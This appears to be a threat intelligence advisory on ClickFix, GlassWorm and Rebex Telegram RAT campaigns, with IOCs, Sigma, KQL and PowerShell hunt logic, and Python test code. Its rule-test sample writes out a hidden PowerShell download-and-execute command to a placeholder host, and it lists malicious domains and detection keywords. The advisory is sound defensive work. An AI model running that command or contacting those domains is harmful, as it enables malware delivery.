Intelligence Date: 2026-04-29
Author: Security Arsenal Threat Intelligence Unit
TLP: WHITE
Threat Summary
Current threat intelligence from the AlienVault OTX network indicates a convergence of sophisticated attack campaigns targeting enterprise sectors, specifically developers, financial services, and government entities. The primary vectors involve social engineering (ClickFix), supply chain compromise (GlassWorm), and spear-phishing (Rebex Telegram RAT).
The ClickFix campaigns demonstrate a high degree of operational variance, impersonating legitimate services like Intuit QuickBooks and Booking.com to trick users into executing malicious commands via native system tools. This "living-off-the-land" approach bypasses traditional signature-based defenses to deploy info-stealers (Lumma, Vidar, RedLine).
Simultaneously, the GlassWorm campaign exhibits advanced capabilities by leveraging the Solana blockchain for C2 communication and payload delivery, specifically targeting developers through compromised package managers to install surveillance browser extensions.
Separately, a Rebex-based Telegram RAT is actively targeting Vietnamese entities using trojanized CHM (Compiled HTML) files, utilizing complex XOR encryption and Python loaders to establish persistence via Shell hijacking.
Threat Actor / Malware Profile
1. ClickFix Campaigns
- Distribution Method: Social engineering via fake browser errors or customer support prompts impersonating Intuit, Booking.com, etc.
- Payload Behavior: Manipulates victims into copy-pasting commands into PowerShell or CMD, leading to the download and execution of payloads.
- Malware Families: Lumma Stealer, Vidar, Odyssey Stealer, NetSupport RAT, RedLine Stealer.
- Techniques: Living-off-the-land (LotL), obfuscation.
2. GlassWorm
- Distribution Method: Supply chain attack via compromised code repositories and package managers.
- Payload Behavior: Fingerprinting machines, stealing crypto wallets/dev credentials, installing fake browser extensions for surveillance.
- C2 Communication: Fetches payloads via the Solana blockchain to evade network detection.
- Malware Type: Infostealer, Remote Access Trojan (RAT).
3. Rebex Telegram RAT
- Distribution Method: Spear-phishing with trojanized CV documents (.chm).
- Payload Behavior: Multi-stage payload using Python interpreters and C++ DLLs. Uses layered XOR encryption.
- Persistence: Shell hijacking and scheduled tasks.
- Target: Vietnam-centric.
IOC Analysis
The provided indicators of compromise (IOCs) span domain infrastructure and file hashes, representing different stages of the attack chain.
- Domains (ClickFix): 8 domains identified (e.g., ustazazharidrus.com, account-help.info). These are likely C2 or payload delivery servers.
  - Action: Block at perimeter DNS and firewalls.
- File Hashes (Telegram RAT): Multiple SHA256, MD5, and SHA1 hashes provided (e.g., ced7fe9c5ec508216e6dd9a59d2d5193a58bdbac5f41a38ea97dd5c7fceef7a5). These correspond to the CHM droppers and subsequent payloads.
  - Action: Scan endpoints for these specific hashes; check quarantine logs.
Operationalization: SOC teams should ingest these domains into threat intel platforms (TIPs) for automatic blocking. File hashes should be added to EDR blocklists for prevention, or to hunting watchlists; if an analyst needs an exclusion so that a sample can be examined, scope it to the isolated analysis host only, never to the production fleet. Note that the hash list mixes SHA256, SHA1 and MD5 values, so any scanner must compute the matching algorithm for each indicator rather than SHA256 alone.
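The following Python script is an added example, not part of the advisory, showing how the two IOC types above can be operationalized against endpoint telemetry. It uses two of the advisory's indicators (one domain pair, three hashes) and handles the two details that trip up naive matchers: a subdomain of a blocked domain should match while a look-alike suffix should not, and the mixed MD5/SHA1/SHA256 hash list must be grouped by algorithm before files are digested. The DNS and file event tuples, the host names and the sample file content are constructed for the example; the sample file's own MD5 is added to the IOC set at demo time so that the file path is exercised without embedding any real malware.

```python
"""Added example (not the advisory's own tooling): match the report's
domain and hash IOCs against constructed endpoint events."""
import hashlib

# IOCs quoted from the advisory's IOC analysis section.
IOC_DOMAINS = {"ustazazharidrus.com", "account-help.info"}
IOC_HASHES = {
    "ced7fe9c5ec508216e6dd9a59d2d5193a58bdbac5f41a38ea97dd5c7fceef7a5",  # SHA256
    "4e9e70c2a8002ce4a70ab43ae80c2a25",                                  # MD5
    "0582822ea03854a3f465a28559be18a14c59f9a9",                          # SHA1
}

# Hex digest length identifies the algorithm; anything else is rejected.
HASH_ALGO_BY_LEN = {32: "md5", 40: "sha1", 64: "sha256"}


def bucket_hashes(hashes):
    """Group IOC hashes by algorithm so a scanner computes only the digests
    it can actually compare against (hashing SHA256 alone would silently
    skip every MD5 and SHA1 indicator)."""
    buckets = {}
    for h in hashes:
        h = h.strip().lower()
        algo = HASH_ALGO_BY_LEN.get(len(h))
        if algo is None or any(c not in "0123456789abcdef" for c in h):
            raise ValueError(f"not a hex MD5/SHA1/SHA256 digest: {h!r}")
        buckets.setdefault(algo, set()).add(h)
    return buckets


def domain_matches(hostname, ioc_domains):
    """True if hostname is an IOC domain or a subdomain of one.
    cdn.account-help.info matches; notaccount-help.info does not."""
    host = hostname.strip().lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in ioc_domains)


def file_matches(data, hash_buckets):
    """Return (algorithm, digest) for the first IOC the content matches, else None."""
    for algo, digests in hash_buckets.items():
        digest = hashlib.new(algo, data).hexdigest()
        if digest in digests:
            return algo, digest
    return None


def scan_events(dns_events, file_events, ioc_domains=IOC_DOMAINS, ioc_hashes=IOC_HASHES):
    """dns_events: iterable of (host, queried_name).
    file_events: iterable of (host, path, content_bytes).
    Returns hit tuples, DNS hits first, then file hits."""
    buckets = bucket_hashes(ioc_hashes)
    hits = []
    for host, name in dns_events:
        if domain_matches(name, ioc_domains):
            hits.append(("dns", host, name))
    for host, path, content in file_events:
        match = file_matches(content, buckets)
        if match:
            hits.append(("file", host, path, match[0]))
    return hits


# Constructed sample telemetry (host names, queries and file content are invented).
SAMPLE_DNS = [
    ("WS-0147", "login.microsoftonline.com"),
    ("WS-0147", "cdn.account-help.info"),
    ("WS-0212", "notaccount-help.info"),
]
SAMPLE_BLOB = b"constructed sample file content, not a real dropper"
SAMPLE_FILES = [("WS-0212", r"C:\Users\a\Downloads\CV_2026.chm", SAMPLE_BLOB)]


def demo():
    """Run the scan with the constructed sample's MD5 added to the IOC set."""
    iocs = set(IOC_HASHES) | {hashlib.md5(SAMPLE_BLOB).hexdigest()}
    return scan_events(SAMPLE_DNS, SAMPLE_FILES, ioc_hashes=iocs)


if __name__ == "__main__":
    for hit in demo():
        print(hit)
```

The demo reports one DNS hit (the subdomain of account-help.info) and one file hit tagged with the algorithm that matched; the look-alike domain is correctly ignored.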
Detection Engineering
Detection logic has been developed to identify the unique behaviors of these campaigns: ClickFix command execution, GlassWorm extension modification, and the Rebex CHM infection chain.
title: Suspicious PowerShell Command Execution via Social Engineering (ClickFix)
id: b4f8e2c9-1a3b-4d5e-8f7a-9b0c1d2e3f4a
status: experimental
description: Detects PowerShell or cmd processes spawned by browsers with command lines containing keywords associated with ClickFix campaigns or obfuscation patterns often used in these attacks.
references:
    - https://otx.alienvault.com/pulse/12345678
tags:
    - attack.initial_access
    - attack.execution
    - attack.t1059.001
author: Security Arsenal
date: 2026/04/29
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith:
            - '\chrome.exe'
            - '\firefox.exe'
            - '\msedge.exe'
            - '\opera.exe'
    selection_child:
        Image|endswith:
            - '\powershell.exe'
            - '\cmd.exe'
    selection_keywords:
        CommandLine|contains:
            - 'copy'
            - 'invoke-expression'
            - 'iex'
            - 'downloadstring'
    condition: selection_parent and selection_child and selection_keywords
falsepositives:
    - Legitimate IT support scripts executed via browser download
level: high
---
title: CHM File Spawning Python or Command Shell Process (Rebex Telegram RAT)
id: a1b2c3d4-5678-90ab-cdef-1234567890ab
status: experimental
description: Detects when the compiled HTML help viewer (hh.exe) spawns a Python interpreter or a command shell, indicative of the Rebex Telegram RAT infection chain (Python loader stage). The parent must be matched on ParentImage; matching Image for both parent and child would never fire.
references:
    - https://otx.alienvault.com/pulse/87654321
tags:
    - attack.initial_access
    - attack.execution
    - attack.t1204.002
author: Security Arsenal
date: 2026/04/29
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\hh.exe'
    selection_child:
        Image|endswith:
            - '\python.exe'
            - '\pythonw.exe'
            - '\cmd.exe'
    condition: selection_parent and selection_child
falsepositives:
    - Legitimate documentation launching scripts (rare)
level: critical
---
title: Suspicious Browser Extension Modification (GlassWorm)
id: c3d4e5f6-7890-12ab-34cd-56ef789012ab
status: experimental
description: Detects non-browser processes writing to browser extension directories, a behavior associated with GlassWorm installing fake surveillance extensions. Firefox profile folders carry a randomised name between 'Profiles\' and 'extensions\', so that path is matched in two parts rather than as one contiguous string.
references:
    - https://otx.alienvault.com/pulse/11223344
tags:
    - attack.persistence
    - attack.t1176
author: Security Arsenal
date: 2026/04/29
logsource:
    category: file_create
    product: windows
detection:
    selection_chromium:
        TargetFilename|contains:
            - '\Google\Chrome\User Data\Default\Extensions\'
            - '\Microsoft\Edge\User Data\Default\Extensions\'
    selection_firefox:
        TargetFilename|contains|all:
            - '\Mozilla\Firefox\Profiles\'
            - '\extensions\'
    filter_browser:
        Image|endswith:
            - '\chrome.exe'
            - '\firefox.exe'
            - '\msedge.exe'
    condition: (selection_chromium or selection_firefox) and not filter_browser
falsepositives:
    - Extension installation by legitimate software installers
level: medium
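To check that the three rules above fire on the intended process and file events and stay quiet on benign ones before they are deployed, here is an added example (not part of the advisory) that expresses each rule as a plain Python predicate and runs it over constructed Windows events. Field names follow the Sysmon/Sigma conventions used in the rules (ParentImage, Image, CommandLine, TargetFilename); the event records, paths and host layout are invented for the example, and the URL in the sample command line is a reserved .invalid name.

```python
"""Added example (not the advisory's own code): the ClickFix, Rebex CHM and
GlassWorm Sigma rules as testable Python predicates over sample events."""

BROWSERS = ("\\chrome.exe", "\\firefox.exe", "\\msedge.exe", "\\opera.exe")
SHELLS = ("\\powershell.exe", "\\cmd.exe")
CLICKFIX_KEYWORDS = ("copy", "invoke-expression", "iex", "downloadstring")
PYTHON_OR_SHELL = ("\\python.exe", "\\pythonw.exe", "\\cmd.exe")
EXT_DIRS_CHROMIUM = (
    "\\google\\chrome\\user data\\default\\extensions\\",
    "\\microsoft\\edge\\user data\\default\\extensions\\",
)
EXT_BROWSERS = ("\\chrome.exe", "\\firefox.exe", "\\msedge.exe")


def _ends_with_any(value, suffixes):
    # Sigma string modifiers are case-insensitive by default; mirror that here.
    v = (value or "").lower()
    return any(v.endswith(s.lower()) for s in suffixes)


def _contains_any(value, needles):
    v = (value or "").lower()
    return any(n.lower() in v for n in needles)


def clickfix_rule(ev):
    """Browser parent -> PowerShell/cmd child with ClickFix-style keywords."""
    return (_ends_with_any(ev.get("ParentImage"), BROWSERS)
            and _ends_with_any(ev.get("Image"), SHELLS)
            and _contains_any(ev.get("CommandLine"), CLICKFIX_KEYWORDS))


def chm_rule(ev):
    """hh.exe (CHM viewer) spawning a Python interpreter or a command shell."""
    return (_ends_with_any(ev.get("ParentImage"), ("\\hh.exe",))
            and _ends_with_any(ev.get("Image"), PYTHON_OR_SHELL))


def extension_rule(ev):
    """Non-browser process writing into a browser extension directory.
    Firefox profiles have a random folder name between 'Profiles\\' and
    'extensions\\', so that path is matched in two parts."""
    path = (ev.get("TargetFilename") or "").lower()
    in_chromium = any(d in path for d in EXT_DIRS_CHROMIUM)
    in_firefox = "\\mozilla\\firefox\\profiles\\" in path and "\\extensions\\" in path
    return (in_chromium or in_firefox) and not _ends_with_any(ev.get("Image"), EXT_BROWSERS)


RULES = {"clickfix": clickfix_rule, "rebex_chm": chm_rule, "glassworm_ext": extension_rule}


def evaluate(events):
    """Return (event_id, rule_name) for every rule that fires on each event."""
    return [(ev["id"], name) for ev in events for name, rule in RULES.items() if rule(ev)]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"id": 1, "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')\""},
    {"id": 2, "ParentImage": r"C:\Windows\explorer.exe",  # benign: not browser-spawned
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File C:\\it\\inventory.ps1"},
    {"id": 3, "ParentImage": r"C:\Windows\hh.exe",
     "Image": r"C:\Users\a\AppData\Local\Programs\Python\Python311\pythonw.exe",
     "CommandLine": "pythonw.exe loader.py"},
    {"id": 4, "Image": r"C:\Windows\System32\rundll32.exe",
     "TargetFilename": r"C:\Users\a\AppData\Local\Google\Chrome\User Data\Default\Extensions\abcd\1.0_0\manifest.json"},
    {"id": 5, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",  # benign: the browser itself
     "TargetFilename": r"C:\Users\a\AppData\Roaming\Mozilla\Firefox\Profiles\x1y2z3.default\extensions\addon@example.invalid.xpi"},
    {"id": 6, "Image": r"C:\Windows\System32\regsvr32.exe",
     "TargetFilename": r"C:\Users\a\AppData\Roaming\Mozilla\Firefox\Profiles\x1y2z3.default\extensions\addon@example.invalid.xpi"},
]

if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(hit)
```

Events 1, 3, 4 and 6 fire and events 2 and 5 do not. One caveat the harness makes visible: the ClickFix keyword list treats 'copy' and 'iex' as bare substrings, so any command line containing robocopy or a word ending in "iex" will also match; tune those keywords against your own baseline before raising the rule above experimental.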
KQL (Microsoft Sentinel)
// Hunt for ClickFix domains and Telegram RAT File Hashes
let IoC_Domains = dynamic(["ustazazharidrus.com", "account-help.info", "quiptly.com", "elive123go.com", "visitbundala.com", "nhacaired88.com", "subsgod.com", "ariciversontile.com"]);
let IoC_Hashes = dynamic(["ced7fe9c5ec508216e6dd9a59d2d5193a58bdbac5f41a38ea97dd5c7fceef7a5", "4e9e70c2a8002ce4a70ab43ae80c2a25", "0582822ea03854a3f465a28559be18a14c59f9a9", "b3bf26bfbf7aec43379523bd18b1ec16", "687cee4e972323e6991acfa59f608a7d1a6e170b", "1323278360d41a74ab09d310f08902087ff2798d1eda99be65d07c1b1123a25c", "67b51a73c72f39b9cf41dd35eb22b369713ab2e576641b40b9089ebc9d4a1fb2", "6db64b44305ff125f729713d7ff516e84e4ca38504a2ab0571eb19597f49feee"]);
// Network Connections to ClickFix Domains
DeviceNetworkEvents
| where RemoteUrl has_any (IoC_Domains)
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemotePort
| union (
// File Creation for Telegram RAT Hashes
DeviceFileEvents
| where SHA256 in (IoC_Hashes) or MD5 in (IoC_Hashes) or SHA1 in (IoC_Hashes)
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessAccountName
)
| union (
// Process Creation for CHM (Telegram RAT) and PowerShell (ClickFix)
DeviceProcessEvents
| where InitiatingProcessFileName =~ "hh.exe" or (InitiatingProcessFileName in~ ("chrome.exe", "firefox.exe", "msedge.exe") and FileName in~ ("powershell.exe", "cmd.exe"))
| project Timestamp, DeviceName, FileName, ProcessCommandLine, InitiatingProcessFileName
)
PowerShell Hunt Script
# IOC Hunter for ClickFix and Telegram RAT
$ClickFixDomains = @("ustazazharidrus.com", "account-help.info", "quiptly.com", "elive123go.com", "visitbundala.com", "nhacaired88.com", "subsgod.com", "ariciversontile.com")
$TelegramRATHashes = @("ced7fe9c5ec508216e6dd9a59d2d5193a58bdbac5f41a38ea97dd5c7fceef7a5", "4e9e70c2a8002ce4a70ab43ae80c2a25", "0582822ea03854a3f465a28559be18a14c59f9a9", "b3bf26bfbf7aec43379523bd18b1ec16", "687cee4e972323e6991acfa59f608a7d1a6e170b", "1323278360d41a74ab09d310f08902087ff2798d1eda99be65d07c1b1123a25c", "67b51a73c72f39b9cf41dd35eb22b369713ab2e576641b40b9089ebc9d4a1fb2", "6db64b44305ff125f729713d7ff516e84e4ca38504a2ab0571eb19597f49feee")
# The hash list mixes SHA256 (64 hex chars), SHA1 (40) and MD5 (32). Group them by algorithm so
# every indicator is compared; hashing only SHA256 would silently skip the MD5 and SHA1 values.
$HashesByAlgo = @{ SHA256 = @(); SHA1 = @(); MD5 = @() }
foreach ($h in $TelegramRATHashes) {
    switch ($h.Length) {
        64 { $HashesByAlgo['SHA256'] += $h.ToLower() }
        40 { $HashesByAlgo['SHA1']   += $h.ToLower() }
        32 { $HashesByAlgo['MD5']    += $h.ToLower() }
    }
}
Write-Host "[+] Checking DNS Cache for ClickFix Domains..." -ForegroundColor Cyan
# Match the domain itself and any subdomain of it (the cache holds the exact name that was queried).
Get-DnsClientCache -ErrorAction SilentlyContinue | Where-Object {
    $entry = $_.Entry.ToLower()
    ($ClickFixDomains | Where-Object { $entry -eq $_ -or $entry.EndsWith(".$_") }).Count -gt 0
} | Select-Object Entry, Data, TimeToLive
Write-Host "[+] Scanning for Telegram RAT File Hashes (User Downloads, Temp and AppData)..." -ForegroundColor Cyan
$PathsToScan = @("$env:USERPROFILE\Downloads", "$env:TEMP", "$env:APPDATA")
foreach ($Path in $PathsToScan) {
    if (-not (Test-Path $Path)) { continue }
    Get-ChildItem -Path $Path -File -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
        $file = $_
        foreach ($algo in $HashesByAlgo.Keys) {
            if ($HashesByAlgo[$algo].Count -eq 0) { continue }
            $hash = (Get-FileHash -LiteralPath $file.FullName -Algorithm $algo -ErrorAction SilentlyContinue).Hash
            if ($hash -and $HashesByAlgo[$algo] -contains $hash.ToLower()) {
                Write-Host "[!] MALICIOUS FILE FOUND ($algo): $($file.FullName)" -ForegroundColor Red
            }
        }
    }
}
Write-Host "[+] Checking for Suspicious Scheduled Tasks (Shell Hijack Indicator)..." -ForegroundColor Cyan
Get-ScheduledTask -ErrorAction SilentlyContinue | Where-Object {
    $_.Actions | Where-Object { $_.Execute -like "*cmd.exe*" -or $_.Execute -like "*powershell.exe*" }
} | Select-Object TaskName, TaskPath, State
---
Response Priorities
- Immediate: Block all listed ClickFix domains at the proxy/DNS level. Quarantine any endpoints matching the Telegram RAT file hashes. Investigate processes spawned by hh.exe (CHM files).
- 24 Hours: Conduct credential audits for accounts used on machines flagged with stealer activity (Lumma/Vidar). Rotate secrets for developers potentially affected by GlassWorm.
- 1 Week: Update email gateways to block .CHM files and implement application controls to restrict browser-spawned PowerShell/CMD executions. Review supply chain security for developer environments.